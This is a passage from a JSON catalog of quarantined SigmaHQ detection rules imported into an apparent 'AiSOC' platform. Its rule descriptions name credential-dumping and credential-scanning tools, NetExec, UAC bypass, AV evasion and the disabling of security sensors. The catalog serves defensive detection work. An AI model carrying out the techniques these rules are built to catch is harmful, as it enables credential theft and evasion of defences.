"SigmaHQ/sigma", "source_id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml" } }, { "id": "sigmahq-sigma-eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "type": "detection", "name": "Security Support Provider (SSP) Added to LSA Configuration", "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-support-provider-ssp-added-to-lsa-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" } }, { "id": "sigmahq-sigma-eeb3e9e1-b685-44e4-9232-6bb701f925b5", "type": "detection", "name": "Kubernetes Secrets Enumeration", "description": "Detects enumeration of Kubernetes secrets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-secrets-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eeb3e9e1-b685-44e4-9232-6bb701f925b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml" } }, { "id": "sigmahq-sigma-eed82177-38f5-4299-8a76-098d50d225ab", "type": "detection", "name": "Kubernetes Admission Controller Modification", "description": "Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1552", "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-admission-controller-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eed82177-38f5-4299-8a76-098d50d225ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml" } }, { "id": "sigmahq-sigma-eee00933-a761-4cd0-be70-c42fe91731e7", "type": "detection", "name": "Arbitrary File Download Via GfxDownloadWrapper.EXE", "description": "Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-gfxdownloadwrapper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eee00933-a761-4cd0-be70-c42fe91731e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml" } }, { "id": "sigmahq-sigma-ef0ff092-a24a-4fbc-beea-06c08d53e085", "type": "detection", "name": "Cisco Dot1x Disabled", "description": "Detects the manual disablement of IEEE 802.1X (dot1x) on a Cisco network device interface.\nDisabling dot1x bypasses Network Access Control (NAC) mechanisms, potentially allowing unauthorized devices to gain access to the internal network.\nThis activity is a common technique used by attackers or malicious insiders to establish persistence or perform lateral movement via rogue devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1556.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-dot1x-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef0ff092-a24a-4fbc-beea-06c08d53e085", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_dot1x_disabled.yml" } }, { "id": "sigmahq-sigma-ef61af62-bc74-4f58-b49b-626448227652", "type": "detection", "name": "Suspicious Active Directory Database Snapshot Via ADExplorer", "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-active-directory-database-snapshot-via-adexplorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef61af62-bc74-4f58-b49b-626448227652", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml" } }, { "id": "sigmahq-sigma-ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99", "type": "detection", "name": "Wusa.EXE Executed By Parent Process Located In Suspicious Location", "description": "Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.\nAttackers could instantiate an instance of \"wusa.exe\" in order to bypass User Account Control (UAC). They can duplicate the access token from \"wusa.exe\" to gain elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wusa-exe-executed-by-parent-process-located-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml" } }, { "id": "sigmahq-sigma-ef9dcfed-690c-4c5d-a9d1-482cd422225c", "type": "detection", "name": "Browser Execution In Headless Mode", "description": "Detects execution of Chromium based browser in headless mode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/browser-execution-in-headless-mode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef9dcfed-690c-4c5d-a9d1-482cd422225c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml" } }, { "id": "sigmahq-sigma-efafe0bf-4238-479e-af8f-797bd3490d2d", "type": "detection", "name": "Outbound Network Connection Initiated By Cmstp.EXE", "description": "Detects a network connection initiated by Cmstp.EXE\nIts uncommon for \"cmstp.exe\" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-initiated-by-cmstp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_cmstp_initiated_connection.yml" } }, { "id": "sigmahq-sigma-efc21479-9e83-41da-8cf1-122e06ba8db3", "type": "detection", "name": "HackTool - NetExec File Indicators", "description": "Detects file creation events indicating NetExec (nxc.exe) execution on the local machine.\nNetExec is a PyInstaller-bundled binary that extracts its embedded data files to a \"_MEI\" directory\nunder the Temp folder upon execution. Files dropped under the \"\\nxc\\\" sub-directory of that\nextraction path are unique to NetExec and serve as reliable on-disk indicators of execution.\nNetExec (formerly CrackMapExec) is a widely used post-exploitation and lateral movement tool used for\nActive Directory enumeration, credential harvesting, and remote code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-netexec-file-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efc21479-9e83-41da-8cf1-122e06ba8db3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_netexec_file_indicators.yml" } }, { "id": "sigmahq-sigma-efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "type": "detection", "name": "Suspicious Program Names", "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-program-names.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_progname.yml" } }, { "id": "sigmahq-sigma-efec536f-72e8-4656-8960-5e85d091345b", "type": "detection", "name": "Set Suspicious Files as System Files Using Attrib.EXE", "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/set-suspicious-files-as-system-files-using-attrib-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efec536f-72e8-4656-8960-5e85d091345b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" } }, { "id": "sigmahq-sigma-f0025a69-e1b7-4dda-a53c-db21fa2d4071", "type": "detection", "name": "Script Interpreter Spawning Credential Scanner - Linux", "description": "Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks).\nThis behavior is indicative of an attempt to find and steal secrets, as seen in the \"Shai-Hulud: The Second Coming\" campaign.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1005", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-interpreter-spawning-credential-scanner-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0025a69-e1b7-4dda-a53c-db21fa2d4071", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_script_interpretor_spawn_credential_scanner.yml" } }, { "id": "sigmahq-sigma-f01d1f70-cd41-42ec-9c0b-26dd9c22bf29", "type": "detection", "name": "Process Deletion of Its Own Executable", "description": "Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-deletion-of-its-own-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f01d1f70-cd41-42ec-9c0b-26dd9c22bf29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_own_image.yml" } }, { "id": "sigmahq-sigma-f033f3f3-fd24-4995-97d8-a3bb17550a88", "type": "detection", "name": "WMI Persistence - Security", "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_wmi_persistence.yml" } }, { "id": "sigmahq-sigma-f0507c0f-a3a2-40f5-acc6-7f543c334993", "type": "detection", "name": "Suspicious File Execution From Internet Hosted WebDav Share", "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-execution-from-internet-hosted-webdav-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml" } }, { "id": "sigmahq-sigma-f0540f7e-2db3-4432-b9e0-3965486744bc", "type": "detection", "name": "Legitimate Application Dropped Executable", "description": "Detects programs on a Windows system that should not write executables to disk", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/legitimate-application-dropped-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml" } }, { "id": "sigmahq-sigma-f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "type": "detection", "name": "Scheduled Task Executed Uncommon LOLBIN", "description": "Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executed-uncommon-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml" } }, { "id": "sigmahq-sigma-f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "type": "detection", "name": "PUA - DefenderCheck Execution", "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-defendercheck-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" } }, { "id": "sigmahq-sigma-f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "type": "detection", "name": "Potential Commandline Obfuscation Using Escape Characters", "description": "Detects potential commandline obfuscation using known escape characters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-commandline-obfuscation-using-escape-characters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml" } }, { "id": "sigmahq-sigma-f0d1feba-4344-4ca9-8121-a6c97bd6df52", "type": "detection", "name": "Credential Dumping Tools Service Execution - Security", "description": "Detects well-known credential dumping tools execution via service execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005", "T1003.006", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-tools-service-execution-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_mal_creddumper.yml" } }, { "id": "sigmahq-sigma-f0e2b768-5220-47dd-b891-d57b96fc0ec1", "type": "detection", "name": "CSExec Service File Creation", "description": "Detects default CSExec service filename which indicates CSExec service installation and execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/csexec-service-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0e2b768-5220-47dd-b891-d57b96fc0ec1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_csexec_service.yml" } }, { "id": "sigmahq-sigma-f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", "type": "detection", "name": "Exports Registry Key To a File", "description": "Detects the export of the target Registry key to a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exports-registry-key-to-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" } }, { "id": "sigmahq-sigma-f0f7be61-9cf5-43be-9836-99d6ef448a18", "type": "detection", "name": "Uninstall Crowdstrike Falcon Sensor", "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uninstall-crowdstrike-falcon-sensor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" } }, { "id": "sigmahq-sigma-f1086bf7-a0c4-4a37-9102-01e573caf4a0", "type": "detection", "name": "Renamed Whoami Execution", "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-whoami-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" } }, { "id": "sigmahq-sigma-f10ed525-97fe-4fed-be7c-2feecca941b1", "type": "detection", "name": "Persistence Via Hhctrl.ocx", "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-hhctrl-ocx.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f10ed525-97fe-4fed-be7c-2feecca941b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" } }, { "id": "sigmahq-sigma-f117933c-980c-4f78-b384-e3d838111165", "type": "detection", "name": "Windows Share Mount Via Net.EXE", "description": "Detects when a share is mounted using the \"net.exe\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-share-mount-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f117933c-980c-4f78-b384-e3d838111165", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml" } }, { "id": "sigmahq-sigma-f11f2808-adb4-46c0-802a-8660db50fa99", "type": "detection", "name": "ImagingDevices Unusual Parent/Child Processes", "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/imagingdevices-unusual-parent-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f11f2808-adb4-46c0-802a-8660db50fa99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml" } }, { "id": "sigmahq-sigma-f1408a58-0e94-4165-b80a-da9f96cf6fc3", "type": "detection", "name": "JXA In-memory Execution Via OSAScript", "description": "Detects possible malicious execution of JXA in-memory via OSAScript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.002", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jxa-in-memory-execution-via-osascript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1408a58-0e94-4165-b80a-da9f96cf6fc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml" } }, { "id": "sigmahq-sigma-f14719ce-d3ab-4e25-9ce6-2899092260b0", "type": "detection", "name": "NTFS Vulnerability Exploitation", "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1499.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 